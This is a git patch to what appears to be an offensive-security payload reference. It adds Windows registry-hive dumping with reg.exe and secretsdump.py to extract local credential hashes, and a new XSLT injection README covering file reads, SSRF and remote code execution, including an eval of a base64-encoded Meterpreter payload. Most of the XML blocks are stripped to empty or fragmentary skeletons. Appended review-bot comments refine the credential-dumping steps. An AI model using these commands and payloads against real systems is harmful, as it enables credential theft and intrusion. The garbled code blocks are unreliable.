From cf5a4b6e97cae0682faab4c38296050ebe5cabcb Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 17 Dec 2019 21:13:59 +0100 Subject: [PATCH] XSLT injection draft --- .../Active Directory Attack.md | 10 + XSLT Injection/README.md | 200 ++++++++++++++++++ 2 files changed, 210 insertions(+) create mode 100644 XSLT Injection/README.md diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index d709ed4..1b694a0 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -768,6 +768,16 @@ or with the builtin Windows RDP and mimikatz sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin" ``` +You can extract the local SAM database to find the local administrator hash : + +```powershell +C:\> reg.exe save hklm\sam c:\temp\sam.save +C:\> reg.exe save hklm\security c:\temp\security.save +C:\> reg.exe save hklm\system c:\temp\system.save +$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL +``` + + ### OverPass-the-Hash (pass the key) Request a TGT with only the NT hash then you can connect to the machine using the TGT. diff --git a/XSLT Injection/README.md b/XSLT Injection/README.md new file mode 100644 index 0000000..3b28790 --- /dev/null +++ b/XSLT Injection/README.md 
@@ -0,0 +1,200 @@ +# XSLT Injection + +> Processing an unvalidated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code + +## Summary + +- [Tools](#tools) +- [Exploit](#exploit) + - [Determine the vendor and version](#determine-the-vendor-and-version) + - [External Entity](#external-entity) + - [Read files and SSRF using document](#read-files-and-ssrf-using-document) + - [Remote Code Execution with Embedded Script Blocks](#remote-code-execution-with-embedded-script-blocks) + - [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper) + - [Remote Code Execution with Java](#remote-code-execution-with-java) + - [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net) + +## Tools + +## Exploit + +### Determine the vendor and version + +```xml + + + + + + +``` + +```xml + + + +
Version: +
Vendor: +
Vendor URL: + + +``` + +### External Entity + +```xml + +]> + + + Fruits &ext_file;: + + + + - : + + + + +``` + +### Read files and SSRF using document + +```xml + + + + + + + Fruits: + + + + - : + + + +``` + +### Remote Code Execution with Embedded Script Blocks + +```xml + + + + + + + + + --- BEGIN COMMAND OUTPUT --- + + --- END COMMAND OUTPUT --- + + +``` + +### Remote Code Execution with PHP wrapper + +Execute the function `readfile`. + +```xml + + + + + + +``` + +Execute the function `scandir`. + +```xml + + + + + +``` + +Execute a PHP meterpreter using PHP wrapper. + +```xml + + + + eval(base64_decode('Base64-encoded Meterpreter code')) + + + + +``` + +### Remote Code Execution with Java + +```xml + + + + + + + + +``` + +```xml + + + + +. + +``` + +### Remote Code Execution with Native .NET + +```xml + + + + + + + + + + + +
+ +
+
+
+``` + +## References + +* [From XSLT code execution to Meterpreter shells - 02 July 2012 - @agarri](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html) +* [XSLT Injection - Fortify](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection) +* [XSLT Injection Basics - Saxon](https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/) \ No newline at end of file
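Review bot: In the `Methodology and Resources/Active Directory Attack.md` hunk, the new `powershell` fence mixes two hosts and two shells without saying so: the three `reg.exe save` lines carry a `C:\>` prompt while the `secretsdump.py ... LOCAL` line carries a `$` prompt, so a reader may try to run impacket's script on the Windows target. Split it into a `powershell` block for the `reg.exe save hklm\sam`, `hklm\security` and `hklm\system` commands and a separate shell block for `secretsdump.py -sam sam.save -security security.save -system system.save LOCAL`, and state in the sentence above it that the three `.save` files are copied to the attacker machine first and that saving the `sam` and `security` hives needs an elevated (administrator) prompt on the target. Two nits in the same hunk: the lead sentence has a space before the colon (`local administrator hash :`), and the added text leaves a double blank line before `### OverPass-the-Hash (pass the key)`.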
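Review bot: The new `XSLT Injection/README.md` lists `## Tools` in the summary but the section is empty, with `## Exploit` following the heading directly; either add the tooling the draft intends to reference or drop the heading and its summary entry until there is content for it. Further points in this hunk: the second `xml` block under `### Remote Code Execution with Java` ends with a line containing only `.`, which reads as a stray character inside the fence; the opening `>` quote has no attribution, and if it is Fortify's description (the Fortify page is already in `## References`) the quote should say so; the third reference is titled `XSLT Injection Basics - Saxon` while its URL is a hunniccyber post on Ektron CMS remote code execution via XSLT transform injection, so the link text should describe the page it points to; and the file is missing its final newline (`\ No newline at end of file`).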